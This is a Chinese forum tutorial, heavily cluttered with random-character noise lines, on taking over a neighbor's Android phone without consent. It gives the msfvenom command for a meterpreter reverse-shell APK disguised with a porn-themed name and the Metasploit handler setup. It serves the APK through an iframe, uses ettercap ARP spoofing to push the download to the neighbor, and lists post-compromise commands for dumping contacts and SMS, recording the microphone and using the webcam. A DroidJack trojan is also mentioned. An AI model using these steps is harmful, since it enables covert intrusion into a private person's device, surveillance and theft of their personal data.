|
+ R: l$ n3 I+ \" H$ A7 S 五、msf+ettercap入侵邻居安卓手机 8 k; }3 g9 g: V' T0 O
5 _9 @& z6 I0 ^' M
, Y4 w' c: a3 j; G
首先启动msf
% m) v& n4 M* m6 r- C& [
1 M# ~# h2 J" W( ?2 {8 L8 V! G# i. J* M2 H( ^$ N2 Z) F) L4 v0 v
先用kali生成一个安卓木马,如下命令: " y; T: W4 M* T. v
5 S! T: t# ?, y: R
+ F6 U6 P7 R, y. k3 _: X7 M7 I Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 1 J2 W0 z5 d7 a9 R
8 ~: K( O# V' D- J4 q0 }0 t2 h, Z+ W# ^; j
 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
0 ]& _* I9 Y' W$ J$ F0 y/ F _# j, t
! s1 L* }2 a6 }" N; `) S5 j
3 h% i% X$ c5 }8 d9 h0 F 然后进入msf
1 b: D) L; c6 Q5 Q2 e R 2 r+ D0 S! W, J* i4 y% J
4 v1 T9 E# k6 D! b* M use exploit/multi/handler
2 R5 l1 d1 Z2 H" i; A
5 I0 Q9 X- g7 D( n8 Y1 R- }7 b; o7 R9 l' J& y& _
set payload android/meterpreter/reverse_tcp , n! j9 p8 q6 P" ]( G5 \- E
s- K0 Q2 b4 s5 g& [
( O* B% R; G( I0 e% [3 l set LHOST 192.168.0.109 //ip为kaili的ip ) L$ R9 `+ z" C2 S( h0 K
6 T8 f3 ~( E) j7 |2 e9 E$ |$ R
( j- Z0 A8 |) z, u' u0 f
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / A5 h& |/ b+ ^) _& T2 M
# n$ N! z* x% u, g
# a1 l7 ^1 ^! q Exploit o; j3 `" L; l8 y# ^* ~
, t' U6 f4 N0 F
2 }) Q2 [5 L: x* @* o) X( ~ 
; G1 _8 S& A+ Y' e 5 e# @ K# n4 N1 w$ I
5 v! B+ j/ v6 x
下面我们开启ettercap -G
, Q$ n. X/ D3 C/ t$ E1 E $ o& c: m: n2 |: w" ?: L
; M0 {$ }4 C! g! k 我物理IP为 8 e4 i7 t. m9 N: J
4 _3 ]9 W. t5 E, N+ s5 G6 Z( u, S
9 l* W$ O+ G' O# i6 ^
7 @* P) X: x% n$ k% e1 S* T( i5 ]6 g0 n( J+ ?
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 8 y6 [0 {, q$ q: L8 o. q
8 x& W3 T9 N [
& }( n! g) o. U
下面我们来设置一下
9 p% e& P ~" H5 ~ Q* g$ C ' M7 |0 U" r/ w
9 D3 i7 a; z/ V/ O! V6 J. G9 l
. g" x5 p- s1 k! u# _+ C
, J) C0 M6 O2 u1 w4 J2 ?; V# L! f3 k5 P
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 2 @+ X( e2 N6 m) X9 D1 b3 i
* X( G1 [/ o! I7 c7 Y# w: p9 q
! U, V) E3 g% d& Z+ i+ T* z; j
' A0 {1 Q1 e# f" ^* W
8 g X' {* h5 |3 u* o
2 }' q @ N3 e  , p1 i/ E5 j& @% G: E; R
& q% z8 B9 j/ G. P
% g; ^1 X" q% r
3 _- H! r( w, A+ e/ a0 e
$ |& S. c+ R$ w3 A. |
6 w7 M2 L& |* t$ a. d
/ ^' E& U- H; D: V. U$ H! S( ~
7 B& o. V7 v$ h* ~) H9 g+ s+ Y' @2 }4 ]) w9 D' i3 B% A- z
4 `! G4 T9 l) t; c# `1 I
; R2 q7 L) D ?) U$ p0 [9 o
* m5 y* z' p6 I6 V' V
) P! c( Q1 S' H$ D. Z, F( o/ ] ) @6 I5 s; v- V7 B9 E
! V- y4 @3 k% ? X) l) `
! X# z' h4 }; U* y
2 O: x/ Q8 _8 g# x. a5 w1 ?$ J
6 F$ U- ^! g# T; Y
6 K" I$ @) r, h$ j3 y
5 C6 h r; n6 q6 x) Z% y! f3 ], W$ [" S |& Q' \5 `
4 T/ u. Q- t2 L, x0 P4 b - M% C. I5 X; D$ l2 f) O& j6 O
) x2 r7 {2 \6 {" P6 i
9 U' t8 ?. D; @0 a
* ~ n0 b2 q% ^$ q1 B8 n. i; c: N1 R
8 L; S( q- @( b2 J- v. b
% p# W! I1 _ F) \. h! @- J* X& Q$ Z" C. f
! ^ Z8 z6 ?4 j5 A9 f
7 V% l: M1 a0 h5 w* K
X( J/ E7 f9 j: L) J6 ~3 i  2 l+ y+ P1 T& Q3 R4 x! r
3 C. ~- L2 E J( T; D' d4 a- @
8 O4 K6 m# ~) |# k 下面我们开始攻击
7 T' y" I8 K* b2 q e9 h7 _ & s N J- Q& n- s# Y
! s' P, m% s/ H0 `: e' T8 [' |; m" x % q0 q7 S. z) h1 B( }, K% y
" h" g6 z* l/ P7 K: g
3 H! y0 X7 h" w/ j
5 c( A+ B8 a0 j, Z! Q2 ~% g; ]
% G i6 n8 f' Z2 p! i, D% l, J) S+ e7 T! d: q$ H, M' n( ?
/ i9 s' E% ?2 S
! y7 [8 k Q" L- e: y
4 t* L3 @8 \& l! S, }1 a/ I - L( r5 |9 q& Y$ S5 j$ k) ?, k
* i5 A' c) @5 w! R9 g
& ?+ M8 h- x5 V$ R @& R
. O% H$ }& t+ [: |8 j$ q
6 V1 w" f7 i0 k" J+ g2 F% h9 Q3 H: t, x
大概过了5分钟多,发现反弹成功了
{% J" M7 i; n- a" ~ / M5 N& Z% h* O" S
: u. N w7 u; ]+ s J
9 |/ F% y1 M3 N X: x
/ J4 z! `0 I i1 z* s; K; S2 C; e* ?, q* v" ~/ l8 w# I
: t0 v9 A, [5 E8 E
' |: p; w' X2 n2 p' L. ~
% h; l( g5 s) V, I+ Z+ F- U , c" V8 ^+ ^) I: n
+ {% D8 U5 w" j7 ~
' B( z+ U9 s" l
& c0 C& b# l: w; P/ q
0 e; i+ }( ~" g3 z& k8 [
+ h R+ \( W+ ?# ?' t! B/ J
" K6 }5 I% C: E$ x
$ ~' I# ?6 A0 L b8 g2 ^
7 A2 k1 \' o, |) A$ y
. y$ k8 y& l: C8 T7 {2 |9 i9 T
! j3 _( y/ u2 l' I/ k5 r' w2 c. I1 ]( ?8 m. S) E y6 b4 w; ^+ j( {8 h
. n. L9 x3 C+ I1 ]4 F# q; U , `1 ]" r2 m; Z, q9 u, [3 N
5 k0 G) T/ A' v4 | 执行命令 . {5 h9 F, @8 n& k+ w4 o W6 b9 ?
+ U) M6 ^. y- n/ C2 B
) q/ l) A3 E# p6 q1 i( N& E# \
' _2 U& @* R$ K# f, y' u. ^+ I
: H) J( G. S( T1 ~" t
1 h6 F! h* e9 h0 m dump_contacts --》这个是导出电话
' x. g- s) R1 F. m7 \0 s, X1 [
K. a4 G* g1 L1 ~6 U8 n7 o. d4 t) s/ z" J! {' D1 c2 i. m7 R I
dump_sms --》这个是导出信息 ( Z, Q" T4 f* J( K6 u W$ u
: O$ o, g9 o6 j- B! F
6 ]; k: U5 Z$ M5 _ record_mic Record audio from the default microphone for X seconds & N3 n! |0 m5 J' o" G. Y
4 C! W8 r O3 R# g. e
, K# M# O1 z( J/ ^. u9 x: k
webcam_chat Start a video chat
: m) e4 x% i" G' n4 C; A/ w
6 h- \& y& h! A& E6 h
8 L: k7 P- w% r webcam_list List webcams 8 J9 l# |/ m2 r2 h/ h6 p1 v# T" r
: b$ ]0 Y/ _) [ H/ U
; c: V% [! F4 h- ]$ J! B
webcam_snap Take a snapshot from the specified webcam 3 B |, ]; o3 j: S$ K/ f8 n( G2 r
8 k3 u! q! }2 ^* r: I0 _# v7 P& B
" L0 I. m8 o/ f' @1 q webcam_stream  lay a video stream from the specified webcam
2 q. ]( X: u. d* \% p & E1 B2 Z8 F: B1 J# P% e. a4 J+ r- l
, S0 V* }, ~# z$ Y
 3 {0 X# P- n k( d' _ V7 Y
' ?$ X. k. R" \* M/ D
. a9 d0 J! L! {8 {# P, v 
" d$ ]0 }+ _1 Z2 ]
9 T0 `2 N w/ ^) F4 ~: K O1 O9 v9 x8 [! l- K/ V+ ?
我们打开看一下电话薄,
l0 V$ o/ q7 m" X6 @; `, b {
/ M1 h' Z i0 b1 w
- T9 H6 {1 J! [# f9 y# _
* I/ u/ [2 R7 }0 Z2 ~$ } , }0 q7 ?% A- x. G/ f. ~
8 G/ d5 O6 d* o; W* C1 K# F  * b6 g9 W$ l, e% |
! s. U. T$ D" C: M) }4 e, h% ~/ `7 j4 e" z+ m1 t6 B
1 ^- ?3 F" Y3 Y4 c" O% b. o! } + H* F, d! n( H( C- @
/ w8 @% k; t! `% F) {) C 
/ v; @4 `4 Q, T( T" N4 N4 k
8 M. k; G* l1 ^0 `4 X8 p5 _$ J% ^6 H% K
 7 B8 a# a- w( U- f. q2 n4 x
\/ r$ k# P" G$ u
: s3 ]- V4 Y% ^4 I/ r
$ T, V. j$ M& C, h) Q & T: X" Q* O& `% {+ H% T1 E
. n' t( G" o1 e2 X 我们同时欺骗成DroidJack木马,使用方法如图: - L/ s9 [/ W0 P6 K2 Q- \
; k- u/ o/ u! [1 E3 W
$ U: p) z) M8 b3 F6 U 
# M: e, _1 U' x) F5 z0 r' z
. x1 m8 M0 t' ^" @! \/ m1 W. ]
9 y7 \8 {- p0 O% I8 d4 f, \
# {: v# q, m' w' h3 s. J$ e9 X . F: q; _9 N; p- \% T
7 M3 G# A3 V7 T3 l* C
 ( _+ b2 Z+ n c, [
5 E$ o) [0 }0 `/ U5 x% h
! B! E$ Z/ @: l. u, v 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 & \' \1 A1 t2 Y) L3 p5 b4 J/ U; {
A( L3 V0 p6 `& ~9 n6 L
( R: V0 ], j8 a5 o; k3 P. F" k& [& N  0 m% k& M, f' b1 a, l
% P o- F* Z; A' c- L) ^
3 \6 o T# w r5 F0 z3 j1 E  ! q' B2 v' e) t r4 U
P& T' A1 Q# B4 P& Z6 Q
( q. \' H- c5 A+ T9 T* ?  ( M6 i4 o! R: q# _8 @) l
! J0 Z# M( L! R2 z8 {* p# X9 s! P5 B
' O9 e$ p1 T* S h; A  
; U. Y) j, x7 u6 }' @! M1 N
# E. v8 |+ W& C, v
5 d. a& @1 ^2 {0 ~+ f
( j$ R" i6 N3 i
| 
发表于 2018-10-20 20:30:37
收藏
支持
反对